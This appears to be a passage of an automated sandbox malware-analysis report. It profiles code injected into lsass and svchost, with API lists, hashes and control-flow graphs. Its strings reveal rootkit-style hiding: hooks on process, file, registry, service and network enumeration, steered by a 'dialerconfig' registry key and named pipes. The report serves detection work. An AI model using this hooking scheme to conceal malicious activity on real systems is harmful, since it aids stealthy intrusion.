                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                          • API String ID: 592178966-758928094
                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                          • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: __std_exception_copy
                                                                          • String ID: Locator'$riptor at (
                                                                          • API String ID: 592178966-4215709766
                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                          • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 756756679-0
                                                                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                          • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1617791916-0
                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                          • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                          Execution Graph

Execution Coverage: 0.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 81
Total number of Limit Nodes: 2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: b559a2181ff40e2a117a780b745b7d932bb3298ad3057c49ecb9ab2035d3dd06
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: 9C11C030A12F0C82FB72ABE9F9387D923D7A784B85F504124DA06E1EA5EFB9C044C350

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000195DD5C1628: GetProcessHeap.KERNEL32 ref: 00000195DD5C1633
                                                                            • Part of subcall function 00000195DD5C1628: HeapAlloc.KERNEL32 ref: 00000195DD5C1642
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16B2
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C16DF
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C16F9
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1719
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1734
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1754
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C176F
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C178F
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17AA
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C17CA
                                                                          • Sleep.KERNEL32 ref: 00000195DD5C1AD7
                                                                          • SleepEx.KERNEL32 ref: 00000195DD5C1ADD
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C17E5
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1805
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1820
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C1840
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C185B
                                                                            • Part of subcall function 00000195DD5C1628: RegOpenKeyExW.ADVAPI32 ref: 00000195DD5C187B
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C1896
                                                                            • Part of subcall function 00000195DD5C1628: RegCloseKey.ADVAPI32 ref: 00000195DD5C18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: f3b7e964aa4799e71de0d0524ef43308711ea80b0fc304bbb8b55dd9ae371198
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: C7315171202E0951FF52ABAADA70BE963E7AB54BD4F0454218E0EE7FD5FE20C861C750

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 57 195dd5c3844-195dd5c384f 58 195dd5c3851-195dd5c3864 StrCmpNIW 57->58 59 195dd5c3869-195dd5c3870 57->59 58->59 60 195dd5c3866 58->60 60->59
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: dialer
                                                                          • API String ID: 0-3528709123
                                                                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction ID: 8525adf6a2d64dd7061414e58bca951bdbbd2a01b88122cd2fc985ec43bc3963
                                                                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                          • Instruction Fuzzy Hash: 89D0A770353B0DC7FF26DFEA88E46E423E2EB08744F884030C90052A50DB18898D9B20

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 3c42989a6f1da65d8c668265381177c755b331e9ddf0642a5a91f75fe2288bf4
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: DF612632B01A90C7DB56CF65D020BBD73D7F754BA4F988125DE5927B88DA38D892CB00

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 369 195dd5c2b2c-195dd5c2ba5 call 195dd5e2ce0 372 195dd5c2ee0-195dd5c2f03 369->372 373 195dd5c2bab-195dd5c2bb1 369->373 373->372 374 195dd5c2bb7-195dd5c2bba 373->374 374->372 375 195dd5c2bc0-195dd5c2bc3 374->375 375->372 376 195dd5c2bc9-195dd5c2bd9 GetModuleHandleA 375->376 377 195dd5c2bed 376->377 378 195dd5c2bdb-195dd5c2beb call 195dd5d6090 376->378 380 195dd5c2bf0-195dd5c2c0e 377->380 378->380 380->372 383 195dd5c2c14-195dd5c2c33 StrCmpNIW 380->383 383->372 384 195dd5c2c39-195dd5c2c3d 383->384 384->372 385 195dd5c2c43-195dd5c2c4d 384->385 385->372 386 195dd5c2c53-195dd5c2c5a 385->386 386->372 387 195dd5c2c60-195dd5c2c73 386->387 388 195dd5c2c83 387->388 389 195dd5c2c75-195dd5c2c81 387->389 390 195dd5c2c86-195dd5c2c8a 388->390 389->390 391 195dd5c2c9a 390->391 392 195dd5c2c8c-195dd5c2c98 390->392 393 195dd5c2c9d-195dd5c2ca7 391->393 392->393 394 195dd5c2d9d-195dd5c2da1 393->394 395 195dd5c2cad-195dd5c2cb0 393->395 396 195dd5c2ed2-195dd5c2eda 394->396 397 195dd5c2da7-195dd5c2daa 394->397 398 195dd5c2cc2-195dd5c2ccc 395->398 399 195dd5c2cb2-195dd5c2cbf call 195dd5c199c 395->399 396->372 396->387 402 195dd5c2dbb-195dd5c2dc5 397->402 403 195dd5c2dac-195dd5c2db8 call 195dd5c199c 397->403 400 195dd5c2cce-195dd5c2cdb 398->400 401 195dd5c2d00-195dd5c2d0a 398->401 399->398 400->401 405 195dd5c2cdd-195dd5c2cea 400->405 406 195dd5c2d3a-195dd5c2d3d 401->406 407 195dd5c2d0c-195dd5c2d19 401->407 409 195dd5c2df5-195dd5c2df8 402->409 410 195dd5c2dc7-195dd5c2dd4 402->410 403->402 414 195dd5c2ced-195dd5c2cf3 405->414 416 195dd5c2d3f-195dd5c2d49 call 195dd5c1bbc 406->416 417 195dd5c2d4b-195dd5c2d58 lstrlenW 406->417 407->406 415 195dd5c2d1b-195dd5c2d28 407->415 412 195dd5c2dfa-195dd5c2e03 call 195dd5c1bbc 409->412 413 195dd5c2e05-195dd5c2e12 lstrlenW 409->413 410->409 419 195dd5c2dd6-195dd5c2de3 410->419 412->413 439 195dd5c2e4a-195dd5c2e55 412->439 423 195dd5c2e14-195dd5c2e1e 413->423 424 195dd5c2e35-195dd5c2e3f call 195dd5c3844 413->424 421 195dd5c2d93-195dd5c2d98 414->421 422 195dd5c2cf9-195dd5c2cfe 414->422 425 195dd5c2d2b-195dd5c2d31 415->425 416->417 416->421 427 195dd5c2d5a-195dd5c2d64 417->427 428 195dd5c2d7b-195dd5c2d8d call 195dd5c3844 417->428 429 195dd5c2de6-195dd5c2dec 419->429 432 195dd5c2e42-195dd5c2e44 421->432 422->401 422->414 423->424 433 195dd5c2e20-195dd5c2e33 call 195dd5c152c 423->433 424->432 425->421 434 195dd5c2d33-195dd5c2d38 425->434 427->428 437 195dd5c2d66-195dd5c2d79 call 195dd5c152c 427->437 428->421 428->432 438 195dd5c2dee-195dd5c2df3 429->438 429->439 432->396 432->439 433->424 433->439 434->406 434->425 437->421 437->428 438->409 438->429 444 195dd5c2ecc-195dd5c2ed0 439->444 445 195dd5c2e57-195dd5c2e5b 439->445 444->396 448 195dd5c2e63-195dd5c2e7d call 195dd5c85c0 445->448 449 195dd5c2e5d-195dd5c2e61 445->449 450 195dd5c2e80-195dd5c2e83 448->450 449->448 449->450 453 195dd5c2e85-195dd5c2ea3 call 195dd5c85c0 450->453 454 195dd5c2ea6-195dd5c2ea9 450->454 453->454 454->444 456 195dd5c2eab-195dd5c2ec9 call 195dd5c85c0 454->456 456->444
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction ID: dde7fd9efa89a5466707bb46948bcd2f38f9c7ac15f82b741b3087f18559b81d
                                                                          • Opcode Fuzzy Hash: b269dd2d9b81f1812a6309050772eb1d9569a02fca7367e1bad0c42bb49a5ac5
                                                                          • Instruction Fuzzy Hash: 40B1AF76212E5882EB669FA9D460BE973E6FB54B84F485016EE09B3F94EF34CC41C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: fc690ca620e4485241193952ba8c83509054a4c62fcfc94005514e0c22233189
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: B0314F72205F848AEB619FA4E8607ED73E5F784744F44442ADA4EA7F98EF38C549C710
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 88954bb95814ee6b498564cf1bdcac9ec7b9223e226e11f4f982859e9a819e51
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 77313A32215F8486EB618B69E8503DE73E5F789794F500126EA9D93F98EF38C546CB00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 211 195dd596910-195dd596916 212 195dd596951-195dd59695b 211->212 213 195dd596918-195dd59691b 211->213 214 195dd596a78-195dd596a8d 212->214 215 195dd59691d-195dd596920 213->215 216 195dd596945-195dd596984 call 195dd596fc0 213->216 220 195dd596a8f 214->220 221 195dd596a9c-195dd596ab6 call 195dd596e54 214->221 218 195dd596922-195dd596925 215->218 219 195dd596938 __scrt_dllmain_crt_thread_attach 215->219 234 195dd596a52 216->234 235 195dd59698a-195dd59699f call 195dd596e54 216->235 226 195dd596931-195dd596936 call 195dd596f04 218->226 227 195dd596927-195dd596930 218->227 224 195dd59693d-195dd596944 219->224 222 195dd596a91-195dd596a9b 220->222 232 195dd596aef-195dd596b20 call 195dd597190 221->232 233 195dd596ab8-195dd596aed call 195dd596f7c call 195dd596e1c call 195dd597318 call 195dd597130 call 195dd597154 call 195dd596fac 221->233 226->224 243 195dd596b22-195dd596b28 232->243 244 195dd596b31-195dd596b37 232->244 233->222 238 195dd596a54-195dd596a69 234->238 246 195dd5969a5-195dd5969b6 call 195dd596ec4 235->246 247 195dd596a6a-195dd596a77 call 195dd597190 235->247 243->244 248 195dd596b2a-195dd596b2c 243->248 249 195dd596b7e-195dd596b94 call 195dd59268c 244->249 250 195dd596b39-195dd596b43 244->250 261 195dd5969b8-195dd5969dc call 195dd5972dc call 195dd596e0c call 195dd596e38 call 195dd59ac0c 246->261 262 195dd596a07-195dd596a11 call 195dd597130 246->262 247->214 255 195dd596c1f-195dd596c2c 248->255 268 195dd596b96-195dd596b98 249->268 269 195dd596bcc-195dd596bce 249->269 256 195dd596b4f-195dd596b5d call 195dd5a5780 250->256 257 195dd596b45-195dd596b4d 250->257 264 195dd596b63-195dd596b78 call 195dd596910 256->264 278 195dd596c15-195dd596c1d 256->278 257->264 261->262 314 195dd5969de-195dd5969e5 __scrt_dllmain_after_initialize_c 261->314 262->234 282 195dd596a13-195dd596a1f call 195dd597180 262->282 264->249 264->278 268->269 275 195dd596b9a-195dd596bbc call 195dd59268c call 195dd596a78 268->275 276 195dd596bd0-195dd596bd3 269->276 277 195dd596bd5-195dd596bea call 195dd596910 269->277 275->269 308 195dd596bbe-195dd596bc6 call 195dd5a5780 275->308 276->277 276->278 277->278 296 195dd596bec-195dd596bf6 277->296 278->255 301 195dd596a21-195dd596a2b call 195dd597098 282->301 302 195dd596a45-195dd596a50 282->302 298 195dd596c01-195dd596c11 call 195dd5a5780 296->298 299 195dd596bf8-195dd596bff 296->299 298->278 299->278 301->302 313 195dd596a2d-195dd596a3b 301->313 302->238 308->269 313->302 314->262 315 195dd5969e7-195dd596a04 call 195dd59abc8 314->315 315->262
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592258832.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                          • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                            • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                            • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                            • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000020.00000002.3592825778.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_32_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
